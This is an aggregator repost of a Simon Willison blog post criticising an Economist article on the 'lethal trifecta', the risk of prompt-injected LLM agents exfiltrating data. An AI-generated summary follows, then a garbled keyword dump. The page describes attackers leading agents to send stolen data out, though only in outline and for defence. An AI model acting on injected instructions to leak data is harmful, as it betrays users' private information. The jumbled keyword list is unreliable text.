Simon Willison’s Weblog: How to stop AI’s “lethal trifecta”

Sep 26, 2025

—

Source URL: https://simonwillison.net/2025/Sep/26/how-to-stop-ais-lethal-trifecta/
Source: Simon Willison’s Weblog
Title: How to stop AI’s “lethal trifecta”

Feedly Summary: How to stop AI’s “lethal trifecta”
This is the second mention of the lethal trifecta in the Economist in just the last week! Their earlier coverage was Why AI systems may never be secure on September 22nd – I wrote about that here, where I called it “the clearest explanation yet I’ve seen of these problems in a mainstream publication".
I like this new article a lot less.
It makes an argument that I mostly agree with: building software on top of LLMs is more like traditional physical engineering – since LLMs are non-deterministic we need to think in terms of tolerances and redundancy:

The great works of Victorian England were erected by engineers who could not be sure of the properties of the materials they were using. In particular, whether by incompetence or malfeasance, the iron of the period was often not up to snuff. As a consequence, engineers erred on the side of caution, overbuilding to incorporate redundancy into their creations. The result was a series of centuries-spanning masterpieces.
AI-security providers do not think like this. Conventional coding is a deterministic practice. Security vulnerabilities are seen as errors to be fixed, and when fixed, they go away. AI engineers, inculcated in this way of thinking from their schooldays, therefore often act as if problems can be solved just with more training data and more astute system prompts.

My problem with the article is that I don’t think this approach is appropriate when it comes to security!
As I’ve said several times before, In application security, 99% is a failing grade. If there’s a 1% chance of an attack getting through, an adversarial attacker will find that attack.
The whole point of the lethal trifecta framing is that the only way to reliably prevent that class of attacks is to cut off one of the three legs!
Generally the easiest leg to remove is the exfiltration vectors – the ability for the LLM agent to transmit stolen data back to the attacker.
Via Hacker News
Tags: security, ai, prompt-injection, generative-ai, llms, exfiltration-attacks, lethal-trifecta

AI Summary and Description: Yes

Summary: The text discusses the challenges and vulnerabilities associated with AI systems, particularly large language models (LLMs), in relation to security. It critiques the prevailing mindset in AI engineering that likens it to conventional software engineering, arguing for a more cautionary approach akin to traditional physical engineering, emphasizing the importance of redundancy and the need to cut off potential attack vectors.

Detailed Description:

The article provides insight into the current discourse around AI security, particularly the concept of the “lethal trifecta” that encompasses three critical aspects that enable attacks on AI systems. Here’s a breakdown of the significant points made in the text:

– **Lethal Trifecta Introduction**:
– The term “lethal trifecta” refers to three conditions that, when present, can facilitate successful attacks on AI systems. While the article does not explicitly define these conditions, it implies they pertain to vulnerabilities in LLMs, particularly focused on exfiltration of data.

– **Non-deterministic Nature of LLMs**:
– LLMs are described as non-deterministic, which means their outputs can vary despite identical inputs. This raises a critical security challenge as it complicates the predictability and reliability of system behavior.

– **Comparison to Traditional Engineering**:
– The author draws a parallel between AI engineering and traditional physical engineering practices, suggesting that, much like engineers of the Victorian era who built with the uncertainty of material properties, AI engineers should adopt a mindset that incorporates redundancy and tolerances to safeguard against vulnerabilities.

– **Critique of Conventional AI Security Approaches**:
– The text argues that conventional AI security practices lack the necessary rigor. Unlike traditional coding, where bugs can be systematically fixed, vulnerabilities in AI models don’t necessarily disappear with training or improved prompts.

– **Importance of Redundancy**:
– The author advocates for a more cautious approach to AI security, emphasizing that even a 1% chance of a successful attack is unacceptable. By reasoning that attackers will exploit even the slightest vulnerabilities, it stresses the need for overall system robustness.

– **Focus on Exfiltration**:
– The article suggests that cutting off exfiltration vectors is the most effective way to mitigate the risk posed by the lethal trifecta, advocating for strategies that prevent LLMs from transferring compromised data to attackers.

Key Implications for Security Professionals:
– The text underscores the need for a paradigm shift in how AI security is approached, advocating for a more comprehensive risk management and mitigation strategy that acknowledges the unique challenges posed by LLMs.
– Security professionals in the AI domain should consider integrating principles from traditional engineering that emphasize redundancy and risk reduction into their practices.
– Developing robust security postures that proactively address vulnerabilities in AI systems, especially those relating to data exfiltration, is critical in safeguarding against adversarial threats.

This analysis encourages professionals to rethink existing security paradigms and adapt new methodologies to improve LLM security, ultimately pushing for a stronger defense strategy against evolving threats in the AI landscape.

.NET 1 2 2025 5 a Act adversarial age agent AI AI landscape ai model AI models AI security AI systems All analysis and and Risk app Application application security Aria art as at ated attack attack vector attack vectors attacker attackers attacks AWS Behavior Bi Bug bugs building built by C caution challenge challenges CI CIA class CleaR co coding compromised concept Condi core coverage creation critical Current cutting D data data exfiltration day days de defense defense strategy DeFi deterministic domain e edge effective Engineer engineering engineers England ERP error errors event evolving threats exfiltration exp exploit fail fine focused for g Gen general generative Go grade gs H hack hacker Hacker News HR http HTTPS implications implications for security in injection io Iron ite J Just k Key knowledge l land language language model language models large large language model large language models Large Language Models (LLMs) led lethal lethal trifecta Li liability llm llms lm M made malfeasance man management Materials mean methodologies mini mitigation mitigation strategy Mode model models my N nation new news NIST no non NPU o oE of off on one only ons opt oS out output Outputs over paradigms Parallel Paris per point post potential practices pre principles pro proactive problem professionals prompt prompt-injection prompts ps public Q R rag Raise rate RCE re reasoning red reduction redundancy reliability Risk risk management risk reduction Ro robust security robustness RoT RSA s safe SAP sec secure security security paradigms security posture security postures security practices security professionals Security Vulnerabilities sequence series shift side Sig Sim Simon Willison size SoC software software engineer software engineering source SSE SSO stolen data strategies Strategy system system behavior system prompt system prompts systems T Tags: ted test text the thinking threat threats Time times to Tor TP traditional coding training training data trifecta UI UN uncertainty under up US use uth V vector vectors vulnerabilities Ware web Wi x z